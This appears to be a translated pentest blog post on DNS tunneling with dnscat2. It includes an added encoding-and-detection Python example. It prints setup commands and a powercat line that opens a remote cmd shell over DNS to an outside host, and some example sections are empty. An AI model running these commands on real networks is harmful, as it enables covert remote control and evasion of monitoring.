Intranet penetration: tunnels and proxies

Scenario: once you have a foothold on the intranet you need a whole range of proxy, pivoting and tunneling tools. There are many of them, each with its own variants, and there is always more to learn, so I am keeping a running summary here and will keep updating it.

1. DNS tunnel

DNS (Domain Name System) is a distributed database that maps domain names to IP addresses, so that users can reach hosts by a memorable name instead of the numeric address the machine actually uses. The process of turning a domain name into the IP address it points at is called domain name resolution (or host name resolution). On Windows you can run `nslookup` from the command line; the answer contains the IP address (A record) and any alias (CNAME record) for the name. You can also query a domain's DNS records through online DNS lookup sites. The record types that matter most here:

  • A (address): maps a host name to an IPv4 address. This is the core record for name resolution.

  • CNAME (canonical name): declares an alias that points at another (canonical) host name.

  • MX (mail exchanger): lists the host responsible for receiving mail sent to the domain.

  • NS (name server): names the server authoritative for a given zone.

1) dnscat2

dnscat2 is an end-to-end tunneling tool that carries its traffic inside the DNS protocol. It supports encrypted and authenticated sessions and multiple concurrent sessions, much like an SSH tunnel, but it is far less conspicuous because the data travels inside ordinary-looking DNS queries and responses, and it works with the common query types (TXT, MX, CNAME, A, AAAA). The client is written in C and the server in Ruby.
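To make the record types above and the dnscat2 idea concrete, here is an added example (mine, not dnscat2's or powercat's code) that does the basic trick dnscat2 relies on: hex-encode the payload, split it into DNS labels under an attacker-controlled domain, wrap one name per query in a wire-format DNS packet, and decode it again on the other side. It then looks at the same traffic from the defender's side with a small resolver-log detector that scores subdomain length and entropy per client and base domain. The tunnel domain `abc.com` is taken from the page; the log line format, the thresholds, and the log lines themselves are constructed for the demo.

```python
"""DNS tunnel encoding, wire format, and a log-based detector (added example)."""
import math
import struct
from collections import Counter

MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # RFC 1035: a name in text form is at most 253 characters
QTYPE = {"A": 1, "CNAME": 5, "MX": 15, "TXT": 16, "AAAA": 28}


def encode_payload(data: bytes, domain: str) -> list:
    """Hex-encode `data` and split it into 63-char labels under `domain`,
    one name per query, never exceeding the 253-char name limit."""
    hexdata = data.hex()
    labels_per_name = max(1, (MAX_NAME - len(domain) - 1) // (MAX_LABEL + 1))
    per_name = labels_per_name * MAX_LABEL
    names = []
    for i in range(0, len(hexdata), per_name):
        chunk = hexdata[i:i + per_name]
        labels = [chunk[j:j + MAX_LABEL] for j in range(0, len(chunk), MAX_LABEL)]
        names.append(".".join(labels) + "." + domain)
    return names


def decode_payload(names: list, domain: str) -> bytes:
    """Inverse of encode_payload: strip the tunnel domain, drop the dots,
    hex-decode the concatenated labels."""
    suffix = "." + domain
    hexdata = "".join(n[:-len(suffix)].replace(".", "")
                      for n in names if n.endswith(suffix))
    return bytes.fromhex(hexdata)


def build_query(name: str, qtype: str = "TXT", txid: int = 0x1337) -> bytes:
    """Build a standard DNS query packet (RD set, one question) for `name`."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b""
    for label in name.rstrip(".").split("."):
        if len(label) > MAX_LABEL:
            raise ValueError("label exceeds 63 octets: %r" % label)
        qname += bytes([len(label)]) + label.encode("ascii")
    return header + qname + b"\x00" + struct.pack("!HH", QTYPE[qtype], 1)


def parse_query_name(packet: bytes):
    """Read the question name and qtype back out of a packet from build_query."""
    pos, labels = 12, []
    while True:
        n = packet[pos]
        pos += 1
        if n == 0:
            break
        if n > MAX_LABEL:   # 0xC0.. would be a compression pointer
            raise ValueError("compression pointers are not expected in a question")
        labels.append(packet[pos:pos + n].decode("ascii"))
        pos += n
    qtype, = struct.unpack("!H", packet[pos:pos + 2])
    return ".".join(labels), qtype


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def detect_tunnel(log_lines, min_queries=5, min_len=40, min_entropy=3.0):
    """Flag (client, base domain) pairs that issue many distinct, long,
    high-entropy subdomains. Constructed log format: '<ts> <client> <qtype> <qname>'.
    Base domain = last two labels (a simplification; real tooling should use
    a public-suffix list)."""
    per_pair = {}
    for line in log_lines:
        _ts, client, _qtype, qname = line.split()
        labels = qname.rstrip(".").lower().split(".")
        base, sub = ".".join(labels[-2:]), ".".join(labels[:-2])
        per_pair.setdefault((client, base), set()).add(sub)
    flagged = set()
    for pair, subs in per_pair.items():
        if len(subs) < min_queries:
            continue
        avg_len = sum(len(s) for s in subs) / len(subs)
        avg_ent = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        if avg_len >= min_len and avg_ent >= min_entropy:
            flagged.add(pair)
    return flagged


# Constructed resolver log: 10.0.0.5 pushes 512 bytes through the tunnel,
# 10.0.0.7 does ordinary lookups.
TUNNEL_NAMES = encode_payload(bytes(range(256)) * 2, "abc.com")
SAMPLE_LOG = ["2024-05-01T10:00:%02d 10.0.0.5 TXT %s" % (i, n)
              for i, n in enumerate(TUNNEL_NAMES)] + [
    "2024-05-01T10:00:10 10.0.0.7 A www.abc.com",
    "2024-05-01T10:00:11 10.0.0.7 AAAA mail.example.org",
    "2024-05-01T10:00:12 10.0.0.7 MX example.org",
]

if __name__ == "__main__":
    names = encode_payload(b"whoami\n", "abc.com")
    print(names[0], parse_query_name(build_query(names[0])))
    print(decode_payload(names, "abc.com"), detect_tunnel(SAMPLE_LOG))
```

Two things worth noticing when you run it: a single `whoami` fits in one query name, so an interactive shell over DNS costs one or two queries per keystroke or line, which is exactly the volume and distinct-subdomain pattern the detector keys on; and the 63-octet label and 253-character name limits are why every real tunnel, dnscat2 included, has to chunk and sequence its data rather than send one long name.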

Server installation


$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ gem install bundler
$ bundle install

Linux client installation


$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ make

Windows client installation

Compile it yourself (the project ships a VS 2008 solution) or download a prebuilt binary from the releases: https://downloads.skullsecurity.org/dnscat2/

  • How to use 1

Server: ruby dnscat2.rb

(Target machine) Client: ./dnscat --dns server=103.vps.219,port=53

With no domain given, the client sends its queries straight to the server's UDP port 53 rather than through the target's recursive resolver, so this mode only works when the target can reach the server on port 53 directly.

Once the connection is established, a session appears on the server console.

Running the `ping` command inside that session succeeds and the client answers.

  • How to use 2 (direct connection)

Server:

Client:

  • How to use 3

Server: ruby ./dnscat2.rb abc.com --secret=123456 --security=open --no-cache

Here the server is authoritative for abc.com, so the client's queries reach it through whatever recursive resolver the target is allowed to use. Note that --security=open switches off dnscat2's session encryption; it is needed because powercat's dnscat mode does not implement it, and it means the tunnel contents are readable by anyone who can capture the DNS traffic.

Client:

Import-Module .\powercat.ps1

powercat -c 103.45.98.219 -p 53 -dns abc.com -e cmd

Result:

References:

https://mp.weixin.qq.com/s/KH-Y_8Df2COINksR6cbB2w

https://blog.csdn.net/localhost01/article/details/86591685

https://mp.weixin.qq.com/s/7kNISpuqFFVTbmal9z6AJA

https://mp.weixin.qq.com/s/vjmCX6JhdVeURCrhuMK4Aw

https://mp.weixin.qq.com/s/yccot8vJw9yNLOrwUshkLQ

Origin blog.csdn.net/qq_32393893/article/details/108937500